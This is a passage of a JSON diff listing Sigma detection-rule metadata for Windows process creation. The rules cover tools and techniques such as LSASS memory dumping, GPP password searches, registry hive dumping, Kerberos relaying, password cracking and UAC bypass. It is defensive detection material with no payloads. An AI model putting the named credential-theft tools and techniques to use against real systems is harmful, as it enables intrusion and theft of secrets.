This value can be decrypted with gpp-decrypt.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_findstr_gpp_passwords.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "value": "Findstr GPP Passwords" + }, + { + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_findstr_lsass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", + "value": "Findstr LSASS" + }, + { + "description": "Detects usage of findstr with the \"EVERYONE\" keyword. 
This is often used in combination with icacls to look for misconfigured files or folders permissions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_findstr_recon_everyone.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", + "value": "Suspicious Recon Activity Using Findstr Keywords" + }, + { + "description": "Detects attempts to disable the Windows Firewall using PowerShell", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_firewall_disabled_via_powershell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_firewall_disabled_via_powershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", + "value": "Windows Firewall Disabled via PowerShell" + }, + { + "description": "Detects the use of Fast Reverse Proxy. 
frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/09/02", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_frp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://asec.ahnlab.com/en/38156/", + "https://github.com/fatedier/frp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", + "value": "Fast Reverse Proxy (FRP)" + }, + { + "description": "Attackers may leverage fsutil to enumerated connected drives.", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2022/03/29", + "falsepositive": [ + "Certain software or administrative tasks may trigger false positives." + ], + "filename": "proc_creation_win_fsutil_drive_enumeration.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Turla has used fsutil fsinfo drives to list connected drives. 
https://attack.mitre.org/techniques/T1120/", + "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1120" + ] + }, + "uuid": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", + "value": "Fsutil Drive Enumeration" + }, + { + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "meta": { + "author": "frack113", + "creation_date": "2022/03/02", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", + "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", + "value": "Fsutil Behavior Set SymlinkEvaluation" + }, + { + "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/10", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_get_localgroup_member_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ] + }, + "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", + "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet" + }, + { + "description": "Detects the execution GMER tool based on image and hash fields.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_gmer_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.gmer.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gmer_execution.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "value": "GMER - Rootkit Detector and Remover Execution" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_gotoopener.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gotoopener.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", + "value": "Use of GoToAssist Remote Access Software" + }, + { + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "meta": { + "author": "Nasreddine Bencherchali, X__Junior", + "creation_date": "2022/11/30", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_gpg4win_susp_usage.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "value": "Gpg4Win Decrypt Files From Suspicious Locations" + }, + { + "description": "Dump sam, system or security hives using REG.exe utility", + "meta": { + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Dumping hives for legitimate purpouse i.e. 
backup or forensic investigation" + ], + "filename": "proc_creation_win_grabbing_sensitive_hives_via_reg.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ] + }, + "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", + "value": "Grabbing Sensitive Hives via Reg Utility" + }, + { + "description": "Detects the use of Windows hacktools based on their import hash (imphash) even if the files have been renamed", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/04", + "falsepositive": [ + "Legitimate use of one of these tools" + ], + "filename": "proc_creation_win_hacktool_imphashes.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml" + ], + "tags": "No established tags" + }, + "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "value": "Windows Hacktool Imphash" + }, + { + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "meta": { + "author": "Florian Roth", + "creation_date": 
"2021/07/31", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_adcspwn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/bats3c/ADCSPwn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1557.001" + ] + }, + "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", + "value": "ADCSPwn Hack Tool" + }, + { + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/20", + "falsepositive": [ + "Other programs that use these command line option and accepts an 'All' parameter" + ], + "filename": "proc_creation_win_hack_bloodhound.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/BloodHoundAD/BloodHound", + "https://github.com/BloodHoundAD/SharpHound", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "value": "Bloodhound and Sharphound Hack Tool" + }, + { + "description": "Detects the use of tools created by a well-known hacktool producer named Cube0x0, which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec etc.)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_cube0x0_tools.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": 
"windows", + "refs": [ + "https://github.com/cube0x0", + "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" + ], + "tags": "No established tags" + }, + "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "value": "Hacktool by Cube0x0" + }, + { + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/02/04", + "falsepositive": [ + "Very unlikely" + ], + "filename": "proc_creation_win_hack_dumpert.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/outflanknl/Dumpert", + "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "value": "Dumpert Process Dumper" + }, + { + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "meta": { + "author": "Vasiliy Burov", + "creation_date": "2020/10/05", + "falsepositive": [ + "Software that uses the caret encased keywords PASS and USER in its command line" + ], + "filename": "proc_creation_win_hack_hydra.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/vanhauser-thc/thc-hydra", + "https://attack.mitre.org/techniques/T1110/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_hydra.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" + ] + }, + "uuid": "aaafa146-074c-11eb-adc1-0242ac120002", + "value": "Hydra 
Password Guessing Hack Tool" + }, + { + "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/24", + "falsepositive": [ + "Very unlikely" + ], + "filename": "proc_creation_win_hack_inveigh.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Kevin-Robertson/Inveigh", + "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_inveigh.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "value": "Inveigh Hack Tool" + }, + { + "description": "Detects command line parameters used by Koadic hack tool", + "meta": { + "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2020/01/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hack_koadic.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", + "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", + "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", + "value": "Koadic Execution" + }, + { + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unlikely" + ], + "filename": 
"proc_creation_win_hack_krbrelay.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/cube0x0/KrbRelay", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelay.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", + "value": "KrbRelay Hack Tool" + }, + { + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/04/26", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_krbrelayup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_krbrelayup.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ] + }, + "uuid": "12827a56-61a4-476a-a9cb-f3068f191073", + "value": "KrbRelayUp Hack Tool" + }, + { + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/12/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_rubeus.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/", + "https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html", + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_rubeus.yml" + ], + "tags": [ + 
"attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ] + }, + "uuid": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "value": "Rubeus Hack Tool" + }, + { + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_safetykatz.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/SafetyKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", + "value": "SafetyKatz Hack Tool" + }, + { + "description": "Detects the execution of SecurityXploded Tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/12/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_secutyxploded.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securityxploded.com/", + "https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_secutyxploded.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555" + ] + }, + "uuid": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "value": "SecurityXploded Tool" + }, + { + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_hack_sharpersist.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", + "https://github.com/mandiant/SharPersist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053" + ] + }, + "uuid": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "value": "SharPersist Usage" + }, + { + "description": "Detects SharpLdapWhoami, a whoami alternative by asking the LDAP service on a domain controller", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/29", + "falsepositive": [ + "Programs that use the same command line flags" + ], + "filename": "proc_creation_win_hack_sharpldapwhoami.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/bugch3ck/SharpLdapWhoami", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "value": "SharpLdapWhoami" + }, + { + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/12/04", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_sysmoneop.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sysmoneop.yml" + ], + "tags": [ + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" + ] + }, + "uuid": 
"8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "value": "SysmonEOP Hack Tool" + }, + { + "description": "Detects the use of Windows Credential Editor (WCE)", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/31", + "falsepositive": [ + "Another service that uses a single -s command line switch" + ], + "filename": "proc_creation_win_hack_wce.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ampliasecurity.com/research/windows-credentials-editor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_wce.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ] + }, + "uuid": "7aa7009a-28b9-4344-8c1f-159489a390df", + "value": "Windows Credential Editor" + }, + { + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_handlekatz.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/codewhitesec/HandleKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_handlekatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "value": "HandleKatz LSASS Dumper Usage" + }, + { + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "meta": { + "author": "frack113", + "creation_date": "2021/12/27", + "falsepositive": [ + "Tools that accidentally use the same command line flags and values" + ], + "filename": "proc_creation_win_hashcat.yml", + "level": "high", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", + "https://hashcat.net/wiki/doku.php?id=hashcat", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hashcat.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.002" + ] + }, + "uuid": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "value": "Password Cracking with Hashcat" + }, + { + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "meta": { + "author": "Sreeman, Florian Roth", + "creation_date": "2022/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_headless_browser_file_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1478234484881436672?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_headless_browser_file_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "value": "File Download with Headless Browser" + }, + { + "description": "Identifies usage of hh.exe executing recently modified .chm files.", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hh_chm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", + "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ] + }, + "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", + "value": "HH.exe Execution" + }, + { + "description": "Detects usage of hh.exe to execute/download remotely hosted .chm files.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hh_chm_http.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html", + "https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm_http.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ] + }, + "uuid": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "value": "HH.exe Remote CHM File Execution" + }, + { + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. 
This folder doesn't require admin privillege to be written and executed from.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/04/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hiding_malware_in_fonts_folder.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hiding_malware_in_fonts_folder.yml" + ], + "tags": [ + "attack.t1211", + "attack.t1059", + "attack.defense_evasion", + "attack.persistence" + ] + }, + "uuid": "ae9b0bd7-8888-4606-b444-0ed7410cb728", + "value": "Writing Of Malicious Files To The Fonts Folder" + }, + { + "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_high_integrity_sdclt.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", + "https://threathunterplaybook.com/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_high_integrity_sdclt.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", + "value": "High Integrity Sdclt Process" + }, + { + "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", + "meta": { + "author": "Florian 
Roth", + "creation_date": "2019/12/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hktl_createminidump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "value": "CreateMiniDump Hacktool" + }, + { + "description": "Detects execution of UACMe (a tool used for UAC bypass) via default PE metadata", + "meta": { + "author": "Christian Burkard, Florian Roth", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_hktl_uacme_uac_bypass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "value": "UAC Bypass Tool UACMe Akagi" + }, + { + "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", + "meta": { + "author": "Maxim Pavlunin", + 